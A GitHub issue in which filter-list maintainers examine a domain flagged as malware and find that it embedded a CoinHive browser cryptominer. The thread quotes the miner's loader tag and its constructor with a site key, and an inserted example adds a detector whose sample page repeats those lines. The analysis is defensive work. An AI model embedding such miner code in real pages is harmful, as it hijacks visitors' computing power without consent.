
Malware domain #190

Closed
1 of 8 tasks
iam-py-test opened this issue May 28, 2021 · 9 comments

Comments

@iam-py-test
Collaborator

iam-py-test commented May 28, 2021

Which entry/entries are you submitting?

aahora.org$all

Which things do they block, hide, or unbreak?

Malware.
See these for more information:
https://www.virustotal.com/gui/url/c5e388bc7c4f32f038e1ffaf055368c55b197251a9969c746a5f5ed7852f4ec4/detection
https://www.fortiguard.com/webfilter?q=aahora.org
https://safeweb.norton.com/report/show?url=aahora.org
https://www.urlvoid.com/scan/aahora.org/
https://quttera.com/detailed_report/aahora.org
https://sitecheck.sucuri.net/results/aahora.org
iam-py-test/my_filters_001@b0b68fb
https://quttera.com/detailed_report/coin-hive.com
https://www.virustotal.com/gui/url/993da527c38d30523da34f9bcf14e3b3b82ef7ce0c1a90604fedcff7587c7ecc/detection
https://www.virustotal.com/gui/domain/aahora.org/detection
https://www.virustotal.com/gui/domain/www.aahora.org/detection
https://www.virustotal.com/gui/url/9ff23b338f715e4c8ebeb2429c9145c3f433a9eb9d2a72fe3d62f3b80d133b27/detection
https://www.scumware.org/search.php (Complete the captcha and enter aahora.org to get results; strangely does not allow report to be linked)

The response: https://github.com/iam-py-test/Badware-Reports-1/blob/main/malware_page_content/malware_web20aahora.org.txt

Which of my lists are you submitting it to?

Antimalware

Which adblocker(s) and version did you use when writing and testing the entries?

  • uBlock Origin
  • AdGuard (Paid desktop version)
  • AdGuard (for browsers)
  • AdBlock
  • Adblock Plus
  • AdGuard Home
  • Blokada
  • I Don't Care About Cookies (The extension)

Other(s):

Adblocker version(s): uBlock Origin development build v1.35.3b7

Which filterlists did you use? Failing to tell this will temporarily close the report until it has been told.

(Optional) Which browser(s) and version did you use?

Edge Version 91.0.864.37

iam-py-test added a commit to iam-py-test/site-reports-001 that referenced this issue May 28, 2021
@liamengland1
Contributor

It looks like the official website of some sort of organization to me. Which part of the site is malicious? Is there a specific page?

https://www.facebook.com/fundacionahora/

@iam-py-test
Collaborator Author

iam-py-test commented May 28, 2021

It looks like the official website of some sort of organization to me. Which part of the site is malicious? Is there a specific page?

https://www.facebook.com/fundacionahora/

I looked at the Facebook link and it looked official. The whole thing is in another language so I am not sure what it says.
Maybe it got bought by someone else and is no longer malware, or is infected?
@DandelionSprout what do you think?

Which part of the site is malicious? Is there a specific page?

The scans flagged the homepage as having malware, but most reported the host as malware too.

@iam-py-test
Collaborator Author

iam-py-test commented May 28, 2021

Looking at the code, it seems like maybe it was flagged because of this:

var miner = new CoinHive.Anonymous('w9WpfXZJ9POkztDmNpey3zA1eq3I3Y2p', {throttle: 0.3});

Or this

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
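As an added example (not code from the issue, the filter list, or CoinHive), the following routine flags the two indicators quoted above in saved page source: the external loader from coinhive.com and an inline CoinHive.Anonymous constructor. The sample page and its site key are constructed placeholders, not the real content of aahora.org.

```javascript
// Added example: static check for the CoinHive indicators quoted in this issue.
// Input is page source as a string (e.g. saved from a report); nothing is fetched.

// Hosts that served the miner loader in this thread.
const MINER_SCRIPT_HOSTS = ['coinhive.com', 'www.coinhive.com'];

function scanForCoinHive(html) {
  const findings = [];
  let m;

  // 1. External loader: <script src="https://coinhive.com/lib/coinhive.min.js">
  const srcRe = /<script[^>]*\ssrc\s*=\s*["']([^"']+)["'][^>]*>/gi;
  while ((m = srcRe.exec(html)) !== null) {
    let host;
    try { host = new URL(m[1], 'https://example.invalid/').hostname; } catch (e) { continue; }
    if (MINER_SCRIPT_HOSTS.includes(host.toLowerCase())) {
      findings.push({ kind: 'external-loader', url: m[1] });
    }
  }

  // 2. Inline constructor: new CoinHive.Anonymous('<site key>', {throttle: 0.3})
  //    The site key identifies the account that would receive the mined coins.
  const ctorRe = /new\s+CoinHive\.(\w+)\s*\(\s*["']([^"']+)["']/g;
  while ((m = ctorRe.exec(html)) !== null) {
    // Look for a throttle option in the same statement (first 300 chars after the match).
    const thr = /throttle\s*:\s*([0-9.]+)/.exec(html.slice(m.index, m.index + 300));
    findings.push({ kind: 'inline-miner', mode: m[1], siteKey: m[2],
                    throttle: thr ? Number(thr[1]) : null });
  }
  return findings;
}

// Constructed sample page; the site key is a placeholder, not a real CoinHive key.
const SAMPLE_PAGE = `<html><head>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script src="https://cdn.example.invalid/jquery.min.js"></script>
</head><body>
<script>
var miner = new CoinHive.Anonymous('PLACEHOLDER_SITE_KEY_0000000000', {throttle: 0.3});
miner.start();
</script>
</body></html>`;

console.log(JSON.stringify(scanForCoinHive(SAMPLE_PAGE), null, 2));
```

The same check run over a page that only references the CoinHive domain in prose (as this issue does) returns nothing, since it requires a script tag or a constructor call.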

@iam-py-test
Collaborator Author

iam-py-test commented May 28, 2021

@llacb47 @DandelionSprout should I close this issue or do you think further investigation is needed?

@iam-py-test
Collaborator Author

It looks like the CoinHive script at https://coinhive.com/lib/coinhive.min.js was replaced with another script:

// Credit to https://w3bits.com/javascript-modal/

let createModal = (modalContent) => {
  let modal = document.createElement('div'),
    modalStyle = document.createElement('style'),
    modalCSS = '.js-modal{ position: fixed; top: 50%; left: 50%; transform: translate(-50%, -50%); background-color: rgba(0, 0, 0, .8); width: 100%; height: 100%; z-index: 999999; } .js-modal-inner{ background-color: rgba(174, 145, 93, .9); position: relative; padding: 50px; font-size: 24px; max-width: 650px; top: 50%; left: 50%; transform: translate(-50%, -50%); color: #000; border-radius: 10px; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: normal; text-align: center; }  .js-modal-inner a { color: #000; text-decoration: underline; } .js-modal-close{ position: absolute; top: -10px; right: 0px; background-color: black; color: #eee; border-width: 0; font-size: 10px; height: 24px; width: 24px; border-radius: 100%; text-align: center; font-family: Arial; cursor: pointer;}',
    modalClose = '<button class="js-modal-close" id="js_modal_close">X</button>',
    theBody = document.getElementsByTagName('body')[0],
    theHead = document.getElementsByTagName('head')[0];

  // Add content and attributes to the modal
  modal.setAttribute('class', 'js-modal');
  modal.innerHTML = '<div class="js-modal-inner">' + modalContent + modalClose + '</div>';
  theBody.appendChild(modal);

  modalClose = document.querySelector('#js_modal_close');

  // Add the modal styles dynamically
  if(modalStyle.styleSheet){
    modalStyle.styleSheet.cssText = modalCSS;
  } else {
    modalStyle.appendChild(document.createTextNode(modalCSS));
  }
  theHead.appendChild(modalStyle);

  // Close the modal on button-click
  if(modalClose) {
    modalClose.addEventListener('click', function() {
      modal.remove();
      modalStyle.remove();
    });
  }
}

// Show it up when loading starts
window.addEventListener('load', function() {
  /* Remember to escape the characters to their respective valid HTML entities, for eg. ' will become \' */
  createModal('This website attempted to run a cryptominer in your browser. <a href="https://www.troyhunt.com/i-now-own-the-coinhive-domain-heres-how-im-fighting-cryptojacking-and-doing-good-things-with-content-security-policies">Click here for more information</a>.');
});

@iam-py-test
Collaborator Author

Closing issue

iam-py-test added a commit to iam-py-test/my_filters_001 that referenced this issue May 28, 2021
@DandelionSprout
Owner

Fun fact: Microsoft Defender on my PC seemingly detects the scripts and script-lines above, as if my GitHub E-mail notifications with them are themselves CoinHive viruses. 😅

@DandelionSprout
Owner

DandelionSprout commented May 29, 2021

The site seems to be quasi-safe after Troy Hunt was able to deactivate CoinHive on that site, seemingly: https://www.troyhunt.com/i-now-own-the-coinhive-domain-heres-how-im-fighting-cryptojacking-and-doing-good-things-with-content-security-policies/

As such, I at least presume that there's no immediate need to add aahora.org to my list.

@iam-py-test
Collaborator Author

The site seems to be quasi-safe after Troy Hunt was able to deactivate CoinHive on that site, seemingly: https://www.troyhunt.com/i-now-own-the-coinhive-domain-heres-how-im-fighting-cryptojacking-and-doing-good-things-with-content-security-policies/

As such, I at least presume that there's no immediate need to add aahora.org to my list.

Yes. I am sorry for the error; I did not realize that.

@iam-py-test iam-py-test mentioned this issue Jun 1, 2021
iam-py-test added a commit to iam-py-test/my_filters_001 that referenced this issue Jun 12, 2021